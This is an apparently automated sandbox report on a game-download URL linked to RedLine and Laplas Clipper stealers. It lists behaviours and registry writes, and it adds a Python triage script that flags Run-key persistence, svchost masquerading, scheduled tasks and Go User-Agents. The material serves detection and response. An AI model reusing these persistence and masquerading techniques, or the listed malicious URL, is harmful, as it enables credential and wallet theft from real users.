Malware Analysis Report

2024-10-19 01:10

Sample ID 230801-z2p79abd25
Target https://feel-easy.games/catalog/counter-strike-go/
Tags
laplas redline @millioner_lzt clipper infostealer persistence spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

Threat Level: Known bad

The submitted URL https://feel-easy.games/catalog/counter-strike-go/ was classified as: Known bad. (The sample is a URL, not a file; the sandbox opened it in Microsoft Edge, see the Command Line under behavioral1.)

Malicious Activity Summary

laplas redline @millioner_lzt clipper infostealer persistence spyware stealer

Laplas Clipper

RedLine

Downloads MZ/PE file

Loads dropped DLL

Executes dropped EXE

Reads user/profile data of web browsers

Adds Run key to start application

Accesses cryptocurrency files/wallets, possible credential harvesting

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Enumerates physical storage devices

Suspicious use of SetWindowsHookEx

GoLang User-Agent

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: MapViewOfSection

Creates scheduled task(s)

Views/modifies file attributes

NTFS ADS

Suspicious use of FindShellTrayWindow

Modifies Internet Explorer settings

Modifies registry class

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of SendNotifyMessage

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-08-01 21:13

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-08-01 21:13

Reported

2023-08-01 21:16

Platform

win10-20230703-en

Max time kernel

193s

Max time network

196s

Command Line

"C:\Windows\system32\LaunchWinApp.exe" "https://feel-easy.games/catalog/counter-strike-go/"

Signatures

Laplas Clipper

stealer clipper laplas

RedLine

infostealer redline

Downloads MZ/PE file

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000\Software\Microsoft\Windows\CurrentVersion\Run\NTSystem = "C:\\Users\\Admin\\AppData\\Roaming\\NTSystem\\ntlhost.exe" | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Description | Indicator | Process | Target
File created | C:\Windows\rescache\_merged\3720402701\2219095117.pri | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A
File created | C:\Windows\rescache\_merged\3720402701\2219095117.pri | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A
File created | C:\Windows\rescache\_merged\4183903823\810424605.pri | C:\Windows\system32\taskmgr.exe | N/A
File created | C:\Windows\rescache\_merged\1601268389\3877292338.pri | C:\Windows\system32\taskmgr.exe | N/A
File created | C:\Windows\rescache\_merged\3720402701\2219095117.pri | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A
File opened for modification | C:\Windows\Debug\ESE.TXT | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A
File created | C:\Windows\rescache\_merged\3720402701\2219095117.pri | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A
File created | C:\Windows\rescache\_merged\3720402701\2219095117.pri | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A

GoLang User-Agent

Description | Indicator | Process | Target
HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A
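Three rows in the tables above are the ones a responder turns into hunting logic: the Run-key write (value NTSystem pointing at a binary under the user's Roaming profile, written by a file named svchost.exe that runs from %LocalAppData%\Temp instead of System32, i.e. a system-binary name used to blend in), the two schtasks.exe launches (for which the sandbox records no task name or command line, so those have to come from the process tree), and the Go-http-client/1.1 User-Agent. The Python below is an added example and not part of this report or the sandbox's output: it carries those rows transcribed into a small structure and applies heuristics chosen here (autorun target in a user-writable directory; a Windows system-binary name running outside System32/SysWOW64; a Go HTTP client User-Agent; a schtasks.exe launch). The rule names, the directory and binary-name lists, and the finding format are this example's own assumptions.

```python
import re
from pathlib import PureWindowsPath

# Rows transcribed from the behavioral1 signature tables in this report
# (description, indicator, process, target); "N/A" is the sandbox's placeholder.
REPORT_ROWS = [
    {"description": "Set value (str)",
     "indicator": r'\REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000'
                  r'\Software\Microsoft\Windows\CurrentVersion\Run\NTSystem'
                  r' = "C:\\Users\\Admin\\AppData\\Roaming\\NTSystem\\ntlhost.exe"',
     "process": r"C:\Users\Admin\AppData\Local\Temp\svchost.exe", "target": "N/A"},
    {"description": "N/A", "indicator": "N/A",
     "process": r"C:\Windows\SysWOW64\schtasks.exe", "target": "N/A"},
    {"description": "HTTP User-Agent header", "indicator": "Go-http-client/1.1",
     "process": "N/A", "target": "N/A"},
]

# Matches the sandbox's rendering of a Run/RunOnce value write: ...\Run\<name> = "<data>"
RUN_KEY_RE = re.compile(
    r'\\CurrentVersion\\Run(?:Once)?\\(?P<name>[^\\=]+?) = "(?P<cmd>[^"]*)"')

# Locations a standard user can write to (heuristic list chosen for this example):
# an autorun pointing here is the dropped-stealer pattern, not an installed app.
USER_WRITABLE_MARKERS = ("\\appdata\\", "\\users\\public\\", "\\programdata\\", "\\temp\\")

# Windows binaries that legitimately run only from the system directories; the
# same file name anywhere else is masquerading (ATT&CK T1036.005). Example list.
SYSTEM_ONLY_NAMES = {"svchost.exe", "lsass.exe", "csrss.exe", "winlogon.exe",
                     "services.exe", "dllhost.exe", "conhost.exe"}
SYSTEM_DIRS = {"c:\\windows\\system32", "c:\\windows\\syswow64"}


def masquerades_as_system_binary(path: str) -> bool:
    """True when a system-only binary name runs from a non-system directory."""
    p = PureWindowsPath(path)
    return (p.name.lower() in SYSTEM_ONLY_NAMES
            and str(p.parent).lower() not in SYSTEM_DIRS)


def run_key_target(indicator: str):
    """Return (value name, executable path) for a Run-key write, else None.
    The sandbox renders the registry string with doubled backslashes, so they
    are collapsed before the path is inspected."""
    m = RUN_KEY_RE.search(indicator)
    if not m:
        return None
    return m.group("name"), m.group("cmd").replace("\\\\", "\\")


def triage(rows):
    """Apply the heuristics to sandbox rows; returns a list of finding dicts."""
    findings = []
    for row in rows:
        proc = row["process"]
        hit = run_key_target(row["indicator"])
        if hit:
            name, exe = hit
            if any(marker in exe.lower() for marker in USER_WRITABLE_MARKERS):
                findings.append({"rule": "run-key-user-writable", "value_name": name,
                                 "path": exe, "writer": proc})
        if proc != "N/A" and masquerades_as_system_binary(proc):
            findings.append({"rule": "masquerading-system-binary", "path": proc})
        if proc != "N/A" and PureWindowsPath(proc).name.lower() == "schtasks.exe":
            # The row carries no task name or command line; pull those from the
            # process tree / command-line section before writing a detection rule.
            findings.append({"rule": "scheduled-task-created", "path": proc})
        if (row["description"].startswith("HTTP User-Agent")
                and row["indicator"].lower().startswith("go-http-client/")):
            findings.append({"rule": "golang-user-agent", "user_agent": row["indicator"]})
    return findings


def rules_hit(findings):
    """Sorted, de-duplicated rule names, convenient for summarising a sample."""
    return sorted({f["rule"] for f in findings})


if __name__ == "__main__":
    for finding in triage(REPORT_ROWS):
        print(finding)
```

The Go User-Agent is a weak signal on its own (plenty of legitimate Go tooling sends it); it becomes useful here because the same host also shows an autorun into Roaming\NTSystem and a svchost.exe outside System32, which is why the example reports findings per row rather than a single verdict.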

Modifies Internet Explorer settings

adware spyware
Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\system32\browser_broker.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A

Modifies registry class

Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "407" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "Microsoft Zira Mobile - English (United States)" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\media.net\NumberOfSubdomains = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\mediafire.com\Total = "51" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "641" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "804" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "409" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "DebugPlugin" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "{06405088-BC01-4E08-B392-5303E75090C8}" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\History\CachePrefix = "Visited:" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "002D 002D 0021 0021 0026 0026 002C 002C 002E 002E 003F 003F 005F 005F 002B 002B 002A 002A 02C9 02C9 02CA 02CA 02C7 02C7 02CB 02CB 02D9 02D9 3000 3000 3105 3105 3106 3106 3107 3107 3108 3108 3109 3109 310A 310A 310B 310B 310C 310C 310D 310D 310E 310E 310F 310F 3110 3110 3111 3111 3112 3112 3113 3113 3114 3114 3115 3115 3116 3116 3117 3117 3118 3118 3119 3119 3127 3127 3128 3128 3129 3129 311A 311A 311B 311B 311C 311C 311D 311D 311E 311E 311F 311F 3120 3120 3121 3121 3122 3122 3123 3123 3124 3124 3125 3125 3126 3126" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\mediafire.com | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = e2872416bdc4d901 | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\FileNames | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\mediafire.com\Total = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.mediafire.com\ = "1310" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "{179F3D56-1B0B-42B2-A962-59B7EF59FE1B}" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "{E164F996-FF93-4675-BDD8-6C47AB0B86B1}" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance | C:\Program Files\7-Zip\7zG.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "1" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\mediafire.com\Total = "1310" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\pubmatic.com\Total = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Revision = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "Near" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "11.0.2013.1022" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = cec7481dbdc4d901 | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "SW" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "{6BFCACDC-A6A6-4343-9CF6-83A83727367B}" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$WordPress | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$http://www.typepad.com/ | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\Certificates | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.mediafire.com\ = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.mediafire.com\ = "769" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\ads.pubmatic.com | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "6;18;22" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "6e-1" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\mediafire.com\Total = "289" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "Adult" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-488886677-2269338296-1239465872-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\NextUpdateDate = "397705972" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A
